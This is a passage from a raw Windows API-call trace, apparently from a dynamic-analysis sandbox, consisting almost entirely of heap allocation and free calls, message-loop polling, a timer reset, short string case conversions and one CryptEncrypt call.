Flags=0x0, Size=0x10) returned 0x34aa310 [0163.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0163.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0163.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0163.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0163.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0163.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0163.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0163.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0163.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0163.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0163.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0163.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0163.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0163.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0163.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0163.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0163.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0163.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0163.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0163.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0163.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0163.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0163.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0163.672] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0163.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0163.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0163.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0163.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0163.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0163.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0163.672] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.673] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0163.673] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.673] CharLowerBuffW (in: lpsz="byte[288]", cchLength=0x9 | out: lpsz="byte[288]") returned 0x9 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0163.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0163.674] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0163.674] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0163.674] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.674] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0163.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0163.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0163.675] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.675] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.675] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0163.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0163.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0163.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0163.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0163.675] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0163.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0163.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0163.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.676] CryptEncrypt (in: hKey=0xaa56a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24165e8*, pdwDataLen=0x8bef68*=0x11a, dwBufLen=0x120 | out: pbData=0x24165e8*, pdwDataLen=0x8bef68*=0x120) returned 1 [0163.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416a28 [0163.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0163.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0163.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0163.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0163.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0163.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 1 [0163.676] TranslateMessage (lpMsg=0x8bf3c0) returned 0 [0163.676] DispatchMessageW (lpMsg=0x8bf3c0) returned 0x0 [0163.676] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0163.676] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0163.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0163.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0163.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0163.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0163.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0163.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0163.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0163.677] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0163.677] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0163.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0163.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0163.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0163.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0163.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0163.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.678] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0163.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0163.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0163.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0163.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0163.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x120) returned 0x2416930 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0163.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0163.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x120) returned 0x2416a58 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416930 | out: hHeap=0x25c0000) returned 1 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.679] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0163.679] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0163.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0163.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0163.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.680] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0163.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0163.680] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0163.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0163.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0163.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0163.680] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0163.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 